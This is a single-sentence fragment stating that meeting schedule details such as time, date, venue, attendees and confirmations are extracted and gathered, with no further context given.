Schedule and appointment details, such as the time, date, and venue of the meetings, the attendees of the meeting, and the meeting confirmation, are extracted and gathered.